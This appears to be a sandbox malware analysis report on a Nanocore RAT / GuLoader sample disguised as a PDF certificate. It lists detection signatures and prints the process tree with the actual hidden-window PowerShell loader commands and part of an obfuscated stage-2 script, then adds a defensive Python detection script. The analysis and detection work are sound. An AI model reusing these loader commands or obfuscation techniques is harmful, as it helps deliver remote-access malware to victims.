Windows
Analysis Report
Certificate#U00b7pdf.exe
Overview
General Information
Detection
Nanocore, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected GuLoader
Yara detected Nanocore RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Sigma detected: Potential PowerShell Command Line Obfuscation
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64native
- Certificate#U00b7pdf.exe (PID: 4180 cmdline: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe" MD5: 6DB7BB3D97AFA79630D4085427E93BDF)
- powershell.exe (PID: 5620 cmdline: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 4800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- powershell.exe (PID: 5828 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #> $Boarspear = """Pe;R eF SuSunSk c OtPri Po Cn D AeBC arTju Cd K g coAsmSem Dee M0Wa4 K B{St Do Tr U KopTe aFor oaatm No(Ov[HaSP ot Fr UiSl nSpgVo] H` $PiS Ca Ul SteAns FwD io Om Fe U n p)Re; D De d A D`$ RT Fh viC hoOpt Ch W r Ti Ex T No= R SNNo eInwUd-OcO Reb UjFoe ScGotOc Me bMiyLdtPre In[Fo] P S c(Ib`$ CSS pa ll UeEn s MwSeoGdm BeDynAn.I nL De An B gJot Ch P Fo/Co A2Su ) I; D Ma Sc F FlFFy oSlrMe(Sc` $ PA DnPit Pai FlMuaT rbAso PrSk s K=Pa0Ra; Bi B`$BaA Nn GtPoi L lspaRabHvo SrBls V P r- Ml AtBo Fa`$PaSDi a SlOpeBas lew So Sm Ze MnSl.Ly LVaeDrn Yg Ft Dh T;I l Lf`$ PA pnHyt Ci N lEkaTabFio StrSks C+ I=Li2An)Af {Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei Sog utBehinr u iVaxUn[Ta` $BiAYondat SiRelIma AbGuo Nr W s t/ T2 P] F No= O P a[uncGloIn n BvPye Sr UntSe]Im: U:CaTTho P BSyyantAue Un(Fj`$ SS Ia Tl SeM es Fw Bo b mfoeBonSu. KlS au Kb Ss MtLor T iSpnAng Z( St`$PhAUnn satBui HlF oaMybMioSo rTus D, I Er2un) G,I n au1Mu6Ca )Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi D xSv[ar`$Ga ACinTrtEdi Slbra NbI no Or AsTa /Tr2Sk]Br P=Ud Un(Su `$SaTIthEf iBao Ct Bh AlrFli Txg a[Pa`$SnAW inBrt CiUn lKraOdbMeo ArHlsMi/S p2Vi]Br L- FobVaxSpoD erCa K1 S1 Fo8Mb) f;S y P L Y Ty }Re Ki[ DS Ent Sr FiA nnStgSl]St [SaS KyGis Lt Ue fmP a. STPle p xgotAb. 
SE BrnSuc Ko rdAfiunn P g b] K: S: RA IS SCS lI LINo.Te G de BtAmS ditPur Zi PnHag T(Ca `$DaTGrhCi iscoUntRuh RorUsiSax M)As;Dd} s `$ViS PkOa rfim Ga Ar mbMae SjA md Re OsEp 0 O=InBDer BauVid SgN ooInmHymSk eDa0Ar4 I Bo' D2Ek5N u0StFFa0Hu 5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma 2 I1 NAAn1 BiAPe' S;P r`$ KSUdkL arMum Jaud rAfb ReKlj AdAkeBrsS t1fo=GoBBr r PuTrdPeg ProLam Pma me P0Gu4 R Uf' R3MiB bl1YnFAs1 R5Ec0My4 M 1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M 5Ra8No2 A1 De1 SFTo1 I8 R4Op5 R 4Pa4Ni5 S8 J2 O3St1K o8 S0Be5in 1In7ud1Ov0 Fo1 b3 S3U n8Bi1 L7 L 0 K2Fl1 MF E0Ma0Ov1Q u3Ge3 bBEr 1De3cl0Fi2 K1 OESc1 B9 L1 A2 M 0 B5Ko'Ou; F`$SlS sk HkrStm CaA nr UbExe A jKodTre As Sk2Ge= FBG ar suScdIm gSkoKam sm DePr0Co4B r Sa' A3 S 1Ko1Sj3Ja0 S2Un2 L6S c0Bu4 M1Be 9 I1 G5 D3 Sp7 S1Dy2W i1 S2 G0 E 4 P1In3 A0 V5Bt0Bu5I n'mo;sm`$P rSSik IrGr mafa ArUnb Ste SjModP ieVas H3Av =PjB Mr Bu udOlg woW im Mm Me U 0ha4 S De' F2 v5Sw0o bFAs0fo5 B 0 S2Ma1 S3 S1 FBMo5D o8Ge2V 4Us 0 A3 s1 M8 Xa0Sl2Fl1V eF S1DeB Q 1 U3ma5 a8 Re3AnFWi1 G8 T0 D2Sy 1po3Ny0 D4 Bo1 E9 S0F o6 P2Av5 L 1Re3Un0sn4 Ag0Co0ba1 FF T1 P5 o 1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T 1nu8Vr1Gr2 R1MiA S1R a3Ge2Un4 U 1Ov3 C1Ud0 Hd'Ro;Ru`$ JoS UkAfr Sm IaSerMo b IeFljUdd WieFes G4 K= IB Krdr uTidDegNoo cmbim keW a0 P4Ru Se 'Te0Di5Re0 Un2Pr0Co4
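The process tree above shows the launch chain that several of the listed signatures key on: a hidden-window powershell.exe reads a script body from a file with a non-script extension under AppData and hands it to a second powershell.exe, whose command line is thousands of characters of junk-interleaved text, and schtasks.exe is used for persistence. The following is an added example, not part of this report and not the sandbox vendor's detection logic: a small Python triage script that applies those heuristics to process-creation events. The event dictionaries are constructed inline in Sysmon Event ID 1 shape; the PIDs, image paths and the first two command lines follow the tree above, while the schtasks command line, the benign PowerShell baseline and the deterministic junk stand-in for the stage-2 script are made up for the example. The regular expressions, field names and thresholds (1000 characters for "very long", 200 tokens with at least half of them three characters or shorter for "junk-interleaved") are assumptions to be tuned against real telemetry.

```python
import ntpath
import re

# Thresholds and patterns are assumptions chosen for this example, not the
# sandbox vendor's rules; tune them against your own process-creation telemetry.
LONG_CMDLINE = 1000                      # chars; the report flags "very long command line"
MIN_TOKENS, SHORT_TOKEN_FRAC = 200, 0.5  # junk-interleaved script heuristic
SCRIPT_EXTS = {".ps1", ".psm1", ".txt"}  # extensions a script file would normally carry

POWERSHELL = re.compile(r"powershell(?:\.exe)?", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
USER_WRITABLE = re.compile(
    r"\\AppData\\(?:Local|Roaming)\\|\\Temp\\|%(?:APPDATA|LOCALAPPDATA|TEMP|TMP)%", re.I)
GET_CONTENT = re.compile(r"\b(?:Get-Content|gc|cat|type)\b\s+['\"]?([^'\";]+)", re.I)
SCHTASKS_TR = re.compile(r'/tr\s+"([^"]*)"|/tr\s+(\S+)', re.I)


def looks_junk_interleaved(cmdline: str) -> bool:
    """Assumed heuristic: a GuLoader-style script splits into hundreds of short
    mixed-case tokens, whereas -EncodedCommand launches have a few long tokens."""
    toks = cmdline.split()
    if len(toks) < MIN_TOKENS:
        return False
    short = sum(1 for t in toks if len(t) <= 3)
    return short / len(toks) >= SHORT_TOKEN_FRAC


def score_event(ev: dict) -> list:
    """Return the names of the heuristics that fire for one process-creation event."""
    image, cmd = ev["image"], ev["cmdline"]
    hits = []
    is_ps = bool(POWERSHELL.search(image) or POWERSHELL.search(cmd))

    if is_ps and HIDDEN_WINDOW.search(cmd):
        hits.append("hidden_window")

    m = GET_CONTENT.search(cmd)
    if is_ps and m:
        path = m.group(1).strip()
        ext = ntpath.splitext(path)[1].lower()
        # Script body staged in a user-writable folder under a non-script extension,
        # then handed to a second powershell.exe: the stage-1 launcher shape above.
        if USER_WRITABLE.search(path) and ext not in SCRIPT_EXTS \
                and len(POWERSHELL.findall(cmd)) >= 2:
            hits.append("staged_script_reinvoke")

    if len(cmd) > LONG_CMDLINE:
        hits.append("very_long_cmdline")
    if is_ps and looks_junk_interleaved(cmd):
        hits.append("junk_interleaved_tokens")

    if image.lower().endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.I):
        tr = SCHTASKS_TR.search(cmd)
        target = (tr.group(1) or tr.group(2)) if tr else ""
        if USER_WRITABLE.search(target):
            hits.append("schtasks_from_user_dir")
    return hits


def triage(events: list) -> dict:
    """Map PID -> fired heuristics for every event that fired at least one."""
    result = {}
    for ev in events:
        hits = score_event(ev)
        if hits:
            result[ev["pid"]] = hits
    return result


# Constructed sample events in Sysmon Event ID 1 shape. PIDs, paths and the first
# two command lines follow the report's process tree; the schtasks line and the
# benign baseline are made up, and the junk script is a deterministic stand-in.
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STAGE1_CMD = (
    "powershell.exe -windowstyle hidden $cas = Get-Content "
    "'C:\\Users\\user\\AppData\\Local\\Skamflelsens\\fameless\\Imitability\\"
    "Ilddaabens\\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''"
)
JUNK = "Pe;R eF SuSunSk c OtPri Po Cn D AeBC K g coAsmSem"   # constructed filler
STAGE2_CMD = f'"{PS_IMAGE}" "$Boarspear = """' + " ".join([JUNK] * 60) + '"""'

EVENTS = [
    {"pid": 4180, "image": "C:\\Users\\user\\Desktop\\Certificate#U00b7pdf.exe",
     "cmdline": '"C:\\Users\\user\\Desktop\\Certificate#U00b7pdf.exe"'},
    {"pid": 5620, "image": PS_IMAGE, "cmdline": STAGE1_CMD},
    {"pid": 5828, "image": PS_IMAGE, "cmdline": STAGE2_CMD},
    {"pid": 7001, "image": "C:\\Windows\\System32\\schtasks.exe",   # constructed
     "cmdline": 'schtasks.exe /create /tn "Updater" '
                '/tr "C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe" /sc minute /mo 5'},
    {"pid": 7002, "image": PS_IMAGE,                                 # constructed, benign
     "cmdline": 'powershell.exe -NoProfile -Command '
                '"Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"'},
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, ", ".join(hits))
```

The staged_script_reinvoke check is the one worth keeping even if the other thresholds prove noisy: a hidden-window PowerShell that reads a file with an unusual extension from a user-writable directory and immediately executes its contents in a second PowerShell has almost no legitimate use, while very long command lines on their own also come from installers and management agents.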